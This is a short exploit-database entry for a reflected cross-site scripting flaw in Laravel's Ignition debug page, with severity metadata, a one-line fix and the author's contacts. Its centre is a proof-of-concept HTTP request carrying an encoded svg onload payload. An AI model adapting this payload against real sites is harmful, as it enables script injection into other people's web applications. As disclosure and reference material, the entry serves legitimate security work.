Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2020-7579 | CWE-79 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2020-10-04 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N | 0.02192 | 0.50148 |
# Exploit Title: laravel - Cross-site Scripting (Reflected) # Exploit Author: saud # Software Link: https://github.com/laravel/framework/releases # Version: 6.18.24 # Homepage: https://laravel.com/ # CVE : CVE-2020-7579 # Tested on: Windows 10 Example exploitation request: ----------------------------------------------------------------------- GET /_ignition/scripts/--%3E%3Csvg%20onload=alert(123)%3E HTTP/1.1 Host: 127.0.0.1 Pragma: no-cache Cache-Control: no-cache, no-transform Connection: close ----------------------------------------------------------------------- Fix : Disable the debug mode by setting APP DEBUG to false ### [ Contacts: ] ### [#] Telegram: @x0Saudi [#] Twitter: @Dmaral3noz
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.